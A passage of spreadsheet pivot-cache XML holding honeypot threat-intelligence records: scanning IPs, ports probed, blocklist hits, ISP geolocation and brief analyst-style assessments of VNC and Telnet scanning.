    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ea8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="This suggests an attempt to connect to VNC service, but the connection was unsuccessful or the attempt was made anonymously. The lack of credentials indicates a potential port scanning or enumeration activity. This could be a reconnaissance phase before attempting to exploit the service further."/>
    <m/>
  </r>
  <r>
    <x v="496"/>
    <x v="496"/>
    <s v="unassigned.172-81-62-242.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:56:33"/>
    <d v="2023-11-28T13:07:56"/>
    <d v="2025-04-29T00:56:33"/>
    <n v="886"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H21"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53140&amp;&amp;63475&amp;&amp;3920&amp;&amp;59776&amp;&amp;64835&amp;&amp;62510&amp;&amp;54137&amp;&amp;61095&amp;&amp;50911&amp;&amp;57126&amp;&amp;56720&amp;&amp;49197&amp;&amp;60886&amp;&amp;59138&amp;&amp;63969&amp;&amp;63174&amp;&amp;64620&amp;&amp;61070&amp;&amp;55419&amp;&amp;51759"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ef2"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="497"/>
    <x v="497"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:54:20"/>
    <d v="2023-08-04T01:40:00"/>
    <d v="2025-04-29T00:54:20"/>
    <n v="1174"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;5900&amp;&amp;23&amp;&amp;26893"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Palghar"/>
    <s v="Vāda"/>
    <s v="1253610"/>
    <s v="NA"/>
    <s v="19.6535"/>
    <s v="73.1481"/>
    <s v="58678"/>
    <s v="Intech Online Private Limited"/>
    <s v="Rank Infratel Pvt Ltd"/>
    <s v="business"/>
    <s v="Rank Infratel Pvt Ltd"/>
    <s v="2016-05-30"/>
    <s v="RANKIN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67dc:d6f6"/>
    <s v="None"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="498"/>
    <x v="498"/>
    <s v="unassigned.172-81-62-204.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:32:52"/>
    <d v="2024-04-15T09:23:16"/>
    <d v="2025-04-29T00:32:52"/>
    <n v="569"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;50180&amp;&amp;56391&amp;&amp;50179&amp;&amp;57957&amp;&amp;50168&amp;&amp;59098&amp;&amp;55293&amp;&amp;59495&amp;&amp;59285&amp;&amp;63226&amp;&amp;52851&amp;&amp;64552&amp;&amp;62098&amp;&amp;54078&amp;&amp;52193&amp;&amp;62019&amp;&amp;54285"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ecc"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No suspicious activity detected for VNC service, likely due to lack of connection attempts or legitimate usage. Normal operation for this service is expected, no malicious behavior identified. No notable events recorded for VNC connectivity."/>
    <s v="VNC Scanning"/>
  </r>
  <r>
    <x v="499"/>
    <x v="499"/>
    <s v="unassigned.172-81-62-166.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:32:41"/>
    <d v="2024-04-14T08:42:06"/>
    <d v="2025-04-29T00:32:41"/>
    <n v="746"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;23789&amp;&amp;61747&amp;&amp;52838&amp;&amp;55392&amp;&amp;63678&amp;&amp;58965&amp;&amp;59614&amp;&amp;51154&amp;&amp;50516&amp;&amp;54897&amp;&amp;52557&amp;&amp;57052&amp;&amp;64357&amp;&amp;58586&amp;&amp;50872&amp;&amp;53293&amp;&amp;55015"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ea6"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown VNC connection attempt. This suggests an unauthorized access attempt to a remote desktop service. No further action was taken due to missing data or unknown source."/>
    <m/>
  </r>
  <r>
    <x v="500"/>
    <x v="500"/>
    <s v="unassigned.172-81-62-187.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:32:40"/>
    <d v="2023-11-28T14:09:26"/>
    <d v="2025-04-29T00:32:40"/>
    <n v="767"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;53362&amp;&amp;65326&amp;&amp;63288&amp;&amp;52239&amp;&amp;59748&amp;&amp;64521&amp;&amp;65533&amp;&amp;51590&amp;&amp;59011"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ebb"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="501"/>
    <x v="501"/>
    <s v="unassigned.172-81-62-203.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:32:05"/>
    <d v="2024-01-19T08:26:37"/>
    <d v="2025-04-29T00:32:05"/>
    <n v="761"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_MT-CPA_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;64953&amp;&amp;7305&amp;&amp;59336&amp;&amp;55869&amp;&amp;58931&amp;&amp;56394&amp;&amp;65284&amp;&amp;59422&amp;&amp;65024&amp;&amp;49932&amp;&amp;61884&amp;&amp;52942&amp;&amp;58532&amp;&amp;61710"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['spam']}"/>
    <n v="30"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ecb"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates an attempt to access or connect using VNC (Virtual Network Computing) service but no further details are available as Data_VNC is marked as Not Available._x000a_No successful connection was established and the activity appears to be a scan or probing attempt rather than a genuine login attempt._x000a_The lack of data suggests that the potential threat might not have even reached the connection stage."/>
    <s v="PortScan _x000a__x000a_(I'm assuming the &quot;NA&quot; stands for Not Attempted, but there is no VNC activity)"/>
  </r>
  <r>
    <x v="502"/>
    <x v="502"/>
    <s v="unassigned.172-81-62-205.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:31:47"/>
    <d v="2023-11-28T04:22:58"/>
    <d v="2025-04-29T00:31:47"/>
    <n v="2047"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_MT-CPA_H5"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;47418&amp;&amp;58454&amp;&amp;51846&amp;&amp;61972&amp;&amp;56550&amp;&amp;54804&amp;&amp;59273&amp;&amp;63952&amp;&amp;59158&amp;&amp;61338&amp;&amp;55563&amp;&amp;52471&amp;&amp;56613&amp;&amp;52994&amp;&amp;56064&amp;&amp;63671&amp;&amp;58481&amp;&amp;65039&amp;&amp;55112&amp;&amp;62709"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ecd"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="503"/>
    <x v="503"/>
    <s v="unassigned.172-81-62-189.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:31:15"/>
    <d v="2024-04-16T09:34:55"/>
    <d v="2025-04-29T00:31:15"/>
    <n v="677"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;38182&amp;&amp;54215&amp;&amp;64153&amp;&amp;51219&amp;&amp;60653&amp;&amp;63798&amp;&amp;57435&amp;&amp;55311&amp;&amp;54858&amp;&amp;56378&amp;&amp;57173&amp;&amp;59370&amp;&amp;61891&amp;&amp;59268&amp;&amp;64793&amp;&amp;57706&amp;&amp;56520&amp;&amp;52273"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ebd"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="Unknown VNC access attempt occurred, possibly indicating unauthorized access to remote desktop connection. No further information is available from this log entry. This could be a legitimate user mistake or a malicious attack trying to exploit the system."/>
    <s v="VNC Scan"/>
  </r>
  <r>
    <x v="504"/>
    <x v="504"/>
    <s v="unassigned.172-81-62-197.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:19:39"/>
    <d v="2023-08-30T06:46:11"/>
    <d v="2025-04-29T00:19:39"/>
    <n v="610"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
